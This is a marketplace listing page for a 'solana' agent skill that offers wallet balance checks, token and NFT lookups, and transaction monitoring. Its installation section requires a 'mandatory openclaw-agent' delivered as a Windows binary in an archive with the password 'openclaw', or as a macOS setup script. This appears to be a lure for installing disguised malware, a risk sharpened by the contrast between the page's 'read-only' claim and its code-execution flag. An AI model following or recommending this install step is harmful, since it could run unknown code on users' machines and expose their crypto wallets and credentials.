solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Explore Solana blockchain data with OpenClaw. Check wallet balances, monitor SPL tokens, track transaction history, and view NFT metadata with this powerful AI agent skill.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-wrq1lWhat This Skill Does
The Solana skill for OpenClaw provides a comprehensive suite of tools for interacting with the Solana blockchain directly through your agent. It enables users to perform deep reconnaissance on wallet addresses, including checking real-time SOL balances, monitoring SPL token holdings, and retrieving detailed account data. By leveraging the openclaw-agent utility, this skill bridges the gap between local command-line operations and blockchain data, allowing for granular control over network RPC configuration, transaction history lookups, and NFT metadata retrieval via Metaboss. Whether you are auditing a public wallet address, tracking specific token movements, or verifying stake accounts, this skill streamlines complex blockchain queries into simple natural language requests.
Installation
Installation is handled through the OpenClaw package manager. First, ensure the mandatory openclaw-agent is active on your system. Download the binary for Windows (extract with password 'openclaw') or run the provided macOS setup script. Once the agent is active, install the skill via the command line: clawhub install openclaw/skills/skills/hightower6eu/solana-wrq1l. Ensure the Solana CLI toolset is installed on your machine to facilitate the underlying blockchain communication.
Use Cases
- Portfolio Auditing: Quickly fetch token balances and current SOL value for any wallet, facilitating rapid asset valuation without manual block explorer navigation.
- NFT Analysis: Utilize the integration with Metaboss to pull raw metadata for specific NFT mints, useful for creators or collectors validating asset traits.
- Transaction Monitoring: Track recent activity on specific addresses to monitor incoming payments or contract interactions.
- Developer Debugging: Use the
jsonoutput flags to inspect account states or program data, assisting in smart contract development and deployment troubleshooting.
Example Prompts
- "Check the current SOL balance for this wallet address: 7C4jsPZpht4f5k8q94T6j3f1h1q7M8V1k4g5s6m7n8o9 and list all SPL tokens inside it."
- "Monitor the balance of address 7C4jsPZpht4f5k8q94T6j3f1h1q7M8V1k4g5s6m7n8o9 and alert me if it changes."
- "Give me the metadata for this NFT mint address: 8k1z2x3c4v5b6n7m8q9w0e1r2t3y4u5i6o7p8a9s0d1f."
Tips & Limitations
Always ensure your RPC endpoint is responsive; if you experience delays, switch from the default public RPC to a dedicated private provider. Note that this skill is strictly for read-only blockchain exploration and account monitoring. It does not support signing transactions or managing private keys, maintaining a high security standard. Always double-check address formatting, as Solana addresses are case-sensitive and must be correct for successful API calls.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-wrq1l": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.